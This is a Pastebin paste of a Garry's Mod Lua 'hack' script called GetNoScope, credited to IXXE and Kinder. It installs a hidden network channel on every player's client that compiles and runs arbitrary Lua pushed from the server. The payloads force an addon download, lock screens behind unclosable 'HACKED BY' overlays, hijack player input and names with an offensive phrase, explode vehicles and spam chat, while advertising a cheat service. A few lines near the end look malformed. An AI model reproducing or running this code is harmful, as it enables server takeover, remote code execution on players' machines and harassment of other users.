Advertisement
kinder20

Untitled

May 3rd, 2019
145
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 19.88 KB | None | 0 0
  1. --[[
  2. Si vous (reprenez / éditez) mon code vous devez me créditer (IXXE) !
  3. Si vous (reprenez / éditez) mon code vous devez me créditer (IXXE) !
  4. Si vous (reprenez / éditez) mon code vous devez me créditer (IXXE) !
  5. Si vous (reprenez / éditez) mon code vous devez me créditer (IXXE) !
  6. ]]--
  7.  
  8.  
  9. print([=[
  10. ██████╗ ███████╗████████╗
  11. ██╔════╝ ██╔════╝╚══██╔══╝
  12. ██║ ███╗█████╗ ██║
  13. ██║ ██║██╔══╝ ██║
  14. ╚██████╔╝███████╗ ██║
  15. ╚═════╝ ╚══════╝ ╚═╝
  16. ███╗ ██╗ ██████╗ ███████╗ ██████╗ ██████╗ ██████╗ ███████╗
  17. ████╗ ██║██╔═══██╗██╔════╝██╔════╝██╔═══██╗██╔══██╗██╔════╝
  18. ██╔██╗ ██║██║ ██║███████╗██║ ██║ ██║██████╔╝█████╗
  19. ██║╚██╗██║██║ ██║╚════██║██║ ██║ ██║██╔═══╝ ██╔══╝
  20. ██║ ╚████║╚██████╔╝███████║╚██████╗╚██████╔╝██║ ███████╗
  21. ╚═╝ ╚═══╝ ╚═════╝ ╚══════╝ ╚═════╝ ╚═════╝ ╚═╝ ╚══════╝
  22. BY IXXE --> GetNoScope V2.1.Self-Leak
  23. Buy GVAC https://discord.gg/hvtEqjk !
  24. ¯\_(ツ)_/¯
  25. ]=])
  26.  
  27. for k, v in pairs( player.GetAll() ) do
  28. if ( v:Alive() ) then
  29. v:GodEnable()
  30. else
  31. v:Spawn()
  32. timer.Simple( 1.2, function()
  33. v:GodEnable()
  34. end)
  35. end
  36. end
  37.  
  38.  
  39. local function rdm_str(len)
  40. if !len or len <= 0 then return '' end
  41. return rdm_str(len - 1) .. ("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789")[math.random(1, 62)]
  42. end
  43.  
  44. local net_string = rdm_str(25)
  45.  
  46. util.AddNetworkString(net_string)
  47. BroadcastLua([[net.Receive("]] .. net_string .. [[",function()CompileString(util.Decompress(net.ReadData(net.ReadUInt(16))),"?")()end)]])
  48. hook.Add("PlayerInitialSpawn", "☂️_PRIVATE_JOKE",function(ply)
  49. if !ply:IsBot() then
  50. ply:SendLua([[net.Receive("]] .. net_string .. [[",function()CompileString(util.Decompress(net.ReadData(net.ReadUInt(16))),"?")()end)]])
  51. end
  52. end)
  53.  
  54. local function SendToClient(code)
  55. local data = util.Compress(code)
  56. local len = #data
  57. net.Start(net_string)
  58. net.WriteUInt(len, 16)
  59. net.WriteData(data, len)
  60. net.Broadcast()
  61. end
  62. timer.Simple( 17, function()
  63. SendToClient([[
  64. print([=[
  65. ██████╗ ███████╗████████╗
  66. ██╔════╝ ██╔════╝╚══██╔══╝
  67. ██║ ███╗█████╗ ██║
  68. ██║ ██║██╔══╝ ██║
  69. ╚██████╔╝███████╗ ██║
  70. ╚═════╝ ╚══════╝ ╚═╝
  71. ███╗ ██╗ ██████╗ ███████╗ ██████╗ ██████╗ ██████╗ ███████╗
  72. ████╗ ██║██╔═══██╗██╔════╝██╔════╝██╔═══██╗██╔══██╗██╔════╝
  73. ██╔██╗ ██║██║ ██║███████╗██║ ██║ ██║██████╔╝█████╗
  74. ██║╚██╗██║██║ ██║╚════██║██║ ██║ ██║██╔═══╝ ██╔══╝
  75. ██║ ╚████║╚██████╔╝███████║╚██████╗╚██████╔╝██║ ███████╗
  76. ╚═╝ ╚═══╝ ╚═════╝ ╚══════╝ ╚═════╝ ╚═════╝ ╚═╝ ╚══════╝
  77. BY IXXE --> GetNoScope V2.Self-Leak
  78. Buy GVAC https://discord.gg/hvtEqjk !
  79. ¯\_(ツ)_/¯
  80. ]=])
  81. hook.Add("Think","🤔_WHY_YOU_WANT_EDIT_MY_CODE",function() gui.HideGameUI() end)
  82. local CreateModel = function(mdl, isragdoll)
  83. local ent
  84. if isragdoll then
  85. ent = ClientsideRagdoll(mdl)
  86. else
  87. ent = ClientsideModel(mdl, RENDERGROUP_OTHER)
  88. end
  89.  
  90. steamworks.FileInfo(1618885873,function(result)steamworks.Download(result.fileid,true,function(name)game.MountGMA(name)end) end)
  91.  
  92. timer.Simple(20, function()
  93.  
  94. game.AddParticles( "particles/enigma.pcf" )
  95.  
  96. PrecacheParticleSystem("enigma")
  97.  
  98. for i = 1, 10 do
  99. ParticleEffectAttach("enigma", PATTACH_ABSORIGIN_FOLLOW, LocalPlayer(), 0)
  100. end
  101. end)
  102.  
  103. return ent
  104. end
  105. local NewHookAdd = function(str, name, func)
  106. --name = "dronesrewrite_hell_hooks" .. name
  107. hook.Add(str, name, func)
  108.  
  109. table.insert(cache, {
  110. str = str,
  111. name = name
  112. })
  113. end
  114. local cache = { }
  115. timercache = { }
  116. local Const = 0
  117. local Noise = nil
  118. local pl = LocalPlayer()
  119. timer.Create("💸_BUY_GVAC_NOW", 2, 1, function()
  120. local dlight = DynamicLight(pl:EntIndex())
  121. if dlight then
  122. dlight.pos = Vector(-2224.216797, -2918.063721, 2354.03125)
  123. dlight.r = 255
  124. dlight.g = 0
  125. dlight.b = 0
  126. dlight.brightness = 16
  127. dlight.Decay = 1000
  128. dlight.Size = 2000
  129. dlight.DieTime = CurTime() + 2
  130. end
  131. local pos = pl:GetPos() + Vector(0, 0, 120)
  132. local ang = Angle(0, pl:GetAngles().y, 0)
  133. local tr = util.TraceLine({
  134. start = pos,
  135. endpos = pos + ang:Forward() * 86,
  136. filter = pl
  137. })
  138. local rag_pos = tr.HitPos + tr.HitNormal * 3 - Vector(0, 0, 80)
  139. for i = 1, 16 do
  140. sound.Play("vo/npc/Barney/ba_laugh04.wav", Vector( 0, 0, 0 ) )
  141. end
  142. local mdl = CreateModel("models/food/hotdog.mdl")
  143. mdl:SetModelScale(5)
  144. mdl:SetAngles(ang + Angle(15, 180, 0))
  145. mdl:SetPos(rag_pos)
  146. mdl:Spawn()
  147. hook.Add("CalcView", "😕_EDIT_MY_CODE_IS_STUPID", function(ply, _pos, _ang, fov)
  148. local view = { }
  149. view.origin = pos + VectorRand()
  150. view.angles = ang
  151. view.fov = fov + math.random(-80, -50)
  152.  
  153. return view
  154. end)
  155.  
  156. timer.Create("👻_WHY_ME_PLEASE_LEAK_GIZEH", 1.4, 1, function()
  157. mdl:Remove()
  158. hook.Remove("CalcView", "😕_EDIT_MY_CODE_IS_STUPID")
  159. end)
  160. end)
  161. ]])
  162. end)
  163.  
  164. timer.Simple( 20, function()
  165. timer.Create( "ouupsss", 0.1, 0, function()
  166. for k,v in pairs(player.GetAll()) do
  167. v:SendLua('RunConsoleCommand("impulse","100")')
  168. end
  169. end)
  170. hook.Add( 'SetupMove', '😈_NO_SCOPED', function( ply, move )
  171. if not ply:IsOnGround() then
  172. move:SetButtons( bit.band( move:GetButtons(), bit.bnot( IN_JUMP ) ) )
  173. end
  174. end )
  175. for k, v in pairs(ents.GetAll()) do if v:IsVehicle() then
  176.  
  177. local explo = ents.Create("env_explosion")
  178. explo:SetPos(v:GetPos())
  179. explo:SetKeyValue("iMagnitude", "300")
  180. explo:Spawn()
  181. explo:Activate()
  182. explo:Fire("Explode", "", 0)
  183. end
  184.  
  185. end
  186. for k,v in pairs(player.GetAll()) do
  187. local a = v:LookupBone("ValveBiped.Bip01_Head1")
  188. local b = v:LookupBone("ValveBiped.Bip01_R_Thigh")
  189. local c = v:LookupBone("ValveBiped.Bip01_L_Thigh")
  190. local d = v:LookupBone("ValveBiped.Bip01_R_Calf")
  191. local e = v:LookupBone("ValveBiped.Bip01_L_Calf")
  192. local f = v:LookupBone("ValveBiped.Bip01_R_UpperArm")
  193. local g = v:LookupBone("ValveBiped.Bip01_L_UpperArm")
  194. local h = v:LookupBone("ValveBiped.Bip01_R_Forearm")
  195. local i = v:LookupBone("ValveBiped.Bip01_L_Forearm")
  196. local j = v:LookupBone("ValveBiped.Bip01_R_Clavicle")
  197. local k = v:LookupBone("ValveBiped.Bip01_L_Clavicle")
  198. v:ManipulateBoneScale( a, Vector(100,100,100))
  199. v:ManipulateBoneScale( b, Vector(100,100,100))
  200. v:ManipulateBoneScale( c, Vector(100,100,100))
  201. v:ManipulateBoneScale( d, Vector(100,100,100))
  202. v:ManipulateBoneScale( e, Vector(100,100,100))
  203. v:ManipulateBoneScale( f, Vector(100,100,100))
  204. v:ManipulateBoneScale( g, Vector(100,100,100))
  205. v:ManipulateBoneScale( h, Vector(100,100,100))
  206. v:ManipulateBoneScale( i, Vector(100,100,100))
  207. v:ManipulateBoneScale( j, Vector(100,100,100))
  208. v:ManipulateBoneScale( k, Vector(100,100,100))
  209. end
  210. SendToClient([[
  211. surface.CreateFont( "1XX3_big_text",{
  212. font = "Open Sans",
  213. size = 500,
  214. weight = 1000,
  215. antialias = true
  216. })
  217. surface.CreateFont("3Y_IXX3", {
  218. font = "Open Sans",
  219. size = ScrW()*0.02,
  220. weight = 10,
  221. blursize = 0,
  222. scanlines = 2.5,
  223. antialias = false
  224. })
  225. local function UwU_text( a )
  226.  
  227. local r = 0.5*math.sin(RealTime()*5.5)*255 + 255/2
  228. local g = -0.5*math.sin(RealTime()*5.5)*255 + 255/2
  229. local b = 215
  230.  
  231. return Color( r, g, b, a or 255 )
  232.  
  233. end
  234. local w,h = ScrW(), ScrH()
  235. local W, H = ScrW(), ScrH()
  236. local MySelf = LocalPlayer()
  237.  
  238. if ohno then
  239. ohno:Remove()
  240. ohno = nil
  241. end
  242.  
  243. ohno = vgui.Create( "DFrame" )
  244. ohno:SetSize( w, h )
  245. ohno:SetPos(0,0)
  246. ohno:SetDraggable ( false )
  247. ohno:SetTitle("")
  248. ohno:MakePopup();
  249. ohno:ShowCloseButton(false)
  250. ohno.Paint = function( self )
  251. Derma_DrawBackgroundBlur( self, self.m_fCreateTime )
  252. Derma_DrawBackgroundBlur( self, self.m_fCreateTime )
  253. end
  254.  
  255. local pw, ph = w, h*0.6
  256. local px, py = w/2-pw/2, h/2-ph/2
  257.  
  258. local Close = vgui.Create( "DButton", ohno )
  259. Close:SetPos(px, py)
  260. Close:SetText( "" )
  261. Close:SetSize( pw, ph )
  262. Close.Paint = function( self, tw, th )
  263.  
  264. local shift = math.sin(RealTime()*3)*1.5 + 5
  265.  
  266. draw.SimpleText( "HackingSΣΣP", "1XX3_big_text", tw/2 , th/2, UwU_text( 55 ), TEXT_ALIGN_CENTER, TEXT_ALIGN_CENTER)
  267. draw.SimpleText( "HackingSΣΣP", "1XX3_big_text", tw/2 - shift , th/2 - shift, Color(250, 250, 250, 255), TEXT_ALIGN_CENTER, TEXT_ALIGN_CENTER)
  268. draw.DrawText( "(╯°□°)╯︵ ┻━┻ BY Δ", "3Y_IXX3", ScrW() * 0.5, ScrH() * (math.random(0,100)*0.01), Color( 240, 240, 240, math.random(230,255) ), TEXT_ALIGN_CENTER )
  269. draw.DrawText( "(╯°□°)╯︵ ┻━┻ BY IXXE", "3Y_IXX3", math.random(0,10), ScrH() * (math.random(0,100)*0.01), Color( 240, 100, 100, math.random(230,255) ), 0 )
  270. draw.DrawText( "KindΣr", "3Y_IXX3", ScrW() * 0.5, ScrH() * (math.random(0,100)*0.01), Color( 240, 240, 240, math.random(230,255) ), TEXT_ALIGN_CENTER )
  271. draw.DrawText( "KindΣr", "3Y_IXX3", math.random(0,10), ScrH() * (math.random(0,100)*0.01), Color( 240, 100, 100, math.random(230,255) ), 0 )
  272. draw.DrawText( "HackingSΣΣP BY JACK", "3Y_IXX3", W * 0.7 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 240, 240, 240, math.random(230,255) ), 0 )
  273. draw.DrawText( "Kappa", "3Y_IXX3", W * 0.38 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 240, 240, 240, math.random(230,255) ), 0 )
  274. draw.DrawText( "Δ", "3Y_IXX3", W * 0.9 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 240, 240, 240, math.random(230,255) ), 0 )
  275. draw.DrawText( "Δ", "3Y_IXX3", W * 0.35 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 240, 240, 240, math.random(230,255) ), 0 )
  276. draw.DrawText( "RIP ;)", "3Y_IXX3", W * 0.98 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 240, 240, 240, math.random(230,255) ), 0 )
  277. draw.DrawText( "Kinder", "3Y_IXX3", W * 0.8 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 240, 240, 240, math.random(230,255) ), 0 )
  278. draw.DrawText( "RIP ;)", "3Y_IXX3", W * 0.73 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 240, 240, 240, math.random(230,255) ), 0 )
  279. draw.DrawText( "HackingSΣΣP", "3Y_IXX3", W * 0.27 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 240, 240, 240, math.random(230,255) ), 0 )
  280. draw.DrawText( "MALADE", "3Y_IXX3", W * 0.1 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 240, 240, 240, math.random(230,255) ), 0 )
  281. draw.DrawText( "RIP ;)", "3Y_IXX3", W * 0.05 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 240, 240, 240, math.random(230,255) ), 0 )
  282. draw.DrawText( "JACK", "3Y_IXX3", W * 0.11 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 240, 240, 240, math.random(230,255) ), 0 )
  283. draw.DrawText( "RIP ;) BY IXXE", "3Y_IXX3", W * 0.75 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 240, 240, 240, math.random(230,255) ), 0 )
  284. draw.DrawText( "HackingSΣΣP", "3Y_IXX3", W * 0.8 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 240, 240, 240, math.random(230,255) ), 0 )
  285. draw.DrawText( "RIP ;)", "3Y_IXX3", W * 0.2 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 240, 240, 240, math.random(230,255) ), 0 )
  286. draw.DrawText( "HackingSΣΣP", "3Y_IXX3", W * 0.1 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 240, 240, 240, math.random(230,255) ), 0 )
  287. draw.DrawText( "HackingSΣΣP", "3Y_IXX3", W * 0 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 240, 240, 240, math.random(230,255) ), 0 )
  288. draw.DrawText( "GetNoScope BY Kinder", "3Y_IXX3", W * 0 + math.random(0,50), ScrH() * (math.random(0,100)*0.01), Color( 240, 240, 240, math.random(230,255) ), 0 )
  289. draw.RoundedBox( 0, 0, math.random(0,W), W, H*0.001, Color(255,255,255,math.random(0,255) ) )
  290. draw.RoundedBox( 0, 0, math.random(0,W), W, H*0.001, Color(255,255,255,math.random(0,255) ) )
  291. draw.RoundedBox( 0, 0, math.random(0,W), W, H*0.001, Color(255,255,255,math.random(0,255) ) )
  292. draw.RoundedBox( 0, 0, math.random(0,W), W, H*0.001, Color(255,255,255,math.random(0,255) ) )
  293. draw.RoundedBox( 0, 0, math.random(0,W), W, H*0.001, Color(255,255,255,math.random(0,255) ) )
  294. end
  295. surface.PlaySound( "vo/npc/male01/ohno.wav" )
  296. surface.PlaySound( "vo/npc/male01/ohno.wav" )
  297. timer.Create("🥵_MENU_LUA_IS_DEAD_BUY_GVAC", 0.1, 0, function()
  298. util.ScreenShake( Vector(0,0,0), 2.5, 50, 0.5, 5000 )
  299. end)
  300. timer.Simple( 15, function()
  301. wut = vgui.Create( "DFrame" )
  302. wut:SetSize( w, h )
  303. wut:SetPos(0,0)
  304. wut:SetDraggable ( false )
  305. wut:SetTitle("")
  306. wut:ShowCloseButton(false)
  307. wut.Paint = function( self )
  308. surface.SetDrawColor(30, 30, 30, 0)
  309. end
  310. local Close = vgui.Create( "DButton", wut )
  311. Close:SetPos(px, py)
  312. Close:SetText( "" )
  313. Close:SetSize( pw, ph )
  314. Close.Paint = function( self, tw, th )
  315.  
  316. local shift = math.sin(RealTime()*3)*1.5 + 5
  317.  
  318. draw.SimpleText( "HackingSΣΣP", "1XX3_big_text", tw/2 , th/2, UwU_text( 55 ), TEXT_ALIGN_CENTER, TEXT_ALIGN_CENTER)
  319. draw.SimpleText( "HackingSΣΣP", "1XX3_big_text", tw/2 - shift , th/2 - shift, Color(250, 250, 250, 255), TEXT_ALIGN_CENTER, TEXT_ALIGN_CENTER)
  320. draw.SimpleText( "HACKED BY", "1XX3_big_text", tw/2 , th/4, UwU_text( 55 ), TEXT_ALIGN_CENTER, TEXT_ALIGN_CENTER)
  321. draw.SimpleText( "HACKED BY", "1XX3_big_text", tw/2 - shift , th/4 - shift, Color(250, 250, 250, 255), TEXT_ALIGN_CENTER, TEXT_ALIGN_CENTER)
  322. end
  323. RunConsoleCommand("r_shader_srgb","1")
  324. RunConsoleCommand("gmod_language","fr")
  325. ohno:Remove()
  326. ohno = nil
  327. local name = GetConVar("sv_skyname"):GetString()
  328. if name == "painted" then
  329. local sky
  330. for _, v in ipairs(ents.GetAll()) do
  331. if v:GetClass() == "env_skypaint" then
  332. sky = v
  333. break
  334. end
  335. end
  336. if !IsValid(sky) then return end
  337. hook.Add("PostRender","☁️_RAINBOW",function()
  338. local col = HSVToColor(CurTime()*30 % 360,1,1)
  339. col = Vector(col.r/255,col.g/255,col.b/255)
  340. sky:SetTopColor(col)
  341. sky:SetBottomColor(col)
  342. end)
  343. else
  344. local prefix = {"lf","ft","rt","bk","dn","up"}
  345. local mats = {}
  346. for i=1,6 do
  347. mats[#mats+1] = Material("skybox/" .. name .. prefix[i])
  348. end
  349. hook.Add("PostRender","☁️_RAINBOW",function()
  350. local col = HSVToColor(CurTime()*30 % 360,1,1)
  351. for i=1,6 do
  352. mats[i]:SetVector("$color",Vector(col.r/255,col.g/255,col.b/255))
  353. end
  354. end)
  355. end
  356. local chienchaud = ClientsideModel("models/food/burger.mdl")
  357. chienchaud:SetNoDraw(true)
  358. chienchaud:SetModelScale(120)
  359. timer.Create("☄️_LOOK_THE_SKY", 0.01, 0, function()
  360. chienchaud:SetAngles(Angle(0, CurTime()*90 % 360 ,180) )
  361. end)
  362.  
  363. local data = {}
  364. local function genchienchaud(id)
  365. local pos = LocalPlayer():GetPos()
  366. data[id] = { Vector(math.random(pos.x-9000,pos.x+9000),math.random(pos.y-9000,pos.y+9000),pos.z + math.random(5000,2000) ), math.random(70, 170) }
  367. end
  368. for i=1, 150 do
  369. genchienchaud(i)
  370. end
  371. hook.Add("PostDrawOpaqueRenderables","🌭_CHIEN_CHAUD",function()
  372. local z = LocalPlayer():GetPos().z
  373. for i=1, #data do
  374. chienchaud:SetPos(data[i][1])
  375. chienchaud:SetupBones()
  376. chienchaud:DrawModel()
  377. data[i][1].z = data[i][1].z - data[i][2] / 20
  378. if data[i][1].z <= z then
  379. genchienchaud(i)
  380. end
  381. end
  382. end)
  383. end )
  384. sound.PlayURL( "https://www.dropbox.com/s/cjaotmjoaavsp5s/Matbow%20-%20Trap%20King.mp3?dl=1", "mono noblock noplay", function( station )
  385. timer.Simple( 0.1, function()
  386. ClientStation = station
  387. station:EnableLooping( true )
  388. station:Play()
  389. station:SetVolume( 2 )
  390. end )
  391. end )
  392. timer.Create("🔒", 0.11, 0, function()
  393. RunConsoleCommand("+attack")
  394. end)
  395. timer.Create("🔓", 0.12, 0, function()
  396. RunConsoleCommand("-attack")
  397. end)
  398. ]])
  399. end)
  400.  
  401. local you = "💸_BUY_GVAC"
  402.  
  403. timer.Simple( 20, function()
  404.  
  405. membresenigma =
  406. {
  407. "RedBoxing",
  408. "Δ",
  409. "Kinder",
  410. "Kappa",
  411. "Kinder",
  412. "Redboxing",
  413. " Δ",
  414. " Δ",
  415. "GET Hacked",
  416. "GET Δ !!!!",
  417. "GET NO SCOPE !!!!",
  418. "GET NO SCOPE !!!!",
  419. "GET HACKED!!!!",
  420. "GET NO SCOPE !!!!",
  421. "GET NO SCOPE !!!!",
  422. "GET NO SCOPE !!!!",
  423. " ΔΔΔ",
  424. "BY Kinder",
  425. "BY IXXE",
  426. "BY Kinder",
  427. "BY IXXE"
  428. }
  429.  
  430.  
  431. ]] )
  432. }
  433.  
  434. timer.Create( "🦠_NE_DEL_RIEN_SINON_CANCER", 0.2, 0, function()
  435. for k, ply in pairs( player.GetAll() ) do
  436. DarkRP.notify(ply, 2, 2, "[Oh No !] "..table.Random(membresenigma).."")
  437. end
  438. end)
  439.  
  440.  
  441. for k,v in pairs(player.GetAll()) do
  442. v:SetRunSpeed(400* 4);
  443. v:SetWalkSpeed(400 * 4);
  444. end
  445.  
  446.  
  447. timer.Create( "🤫_RIP_U_VAC_BANNED", 1, 0, function()
  448. for k,v in pairs(player.GetAll()) do
  449. v:GodEnable()
  450. v:setDarkRPVar( "rpname", "La HackingSΣΣP Vous Viol " )
  451. end
  452.  
  453. end )
  454.  
  455. end)
  456.  
  457.  
  458. timer.Create( "🤤_SPAM", 0, 0, function()
  459. SendToClient([[print("GET HACKED !! BY Kinder")]])
  460. print("GET HACKED !! BY IXXE")
  461. end)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement